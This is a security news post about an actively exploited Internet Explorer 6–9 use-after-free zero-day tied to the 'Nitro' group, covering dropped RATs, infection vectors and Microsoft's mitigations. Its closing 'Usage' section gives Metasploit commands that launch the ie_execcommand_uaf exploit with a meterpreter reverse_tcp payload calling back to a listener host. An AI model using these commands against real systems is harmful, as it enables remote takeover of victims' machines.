Microsoft has confirmed reports that a zero-day vulnerability in its Internet Explorer browser is being actively attacked in the wild. Four active exploits of a zero-day vulnerability in the browser exists. Microsoft will push out an out-of-cycle Windows patch to temporarily fix the critical Internet Explorer flaw.Security researcher Eric Romang identified the exploit code on a server used by the "Nitro" hacking group, believed to have exploited the Java zero-day vulnerability reported last month. Security firm Rapid7 advises that Internet users try a different Web browser. The malware may be linked to an ongoing attack on companies that has been dubbed "Nitro", and was first discovered in October by Symantec.
The zero-day in IE 6-9 is a use-after-free memory corruption vulnerability, similar to a buffer overflow, that would enable an attacker to remotely execute code on a compromised machine. The original exploit payload dropped the PoisonIvy remote access Trojan (RAT) via a corrupted Flash movie file. The latest payload discovered dropped the PlugX RAT via the same corrupted Flash movie.
This type of attack is typically begun with a phishing email, or by tricking users into clicking links in social media. The security advisory notes that mainstream websites that have ads placed on the site via third-party ad servers could also be vulnerable if the ad servers are compromised. In other words, any site could be used to take advantage of the IE flaw.It's a serious flaw.
Even, The German government has started telling its citizens to switch to other browsers. Microsoft has reported that most users are not affected by the bug, and the number of attacks has been limited. In the company's update about the bug, they suggest either deactivating ActiveX controls or using their Enhanced Mitigation Experience Toolkit until a patch is released.
Metasploit also Release PoC for this ."This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it." Get Exploit Here,
Usage :
use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.178.33 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.33 exploit sysinfo getuid
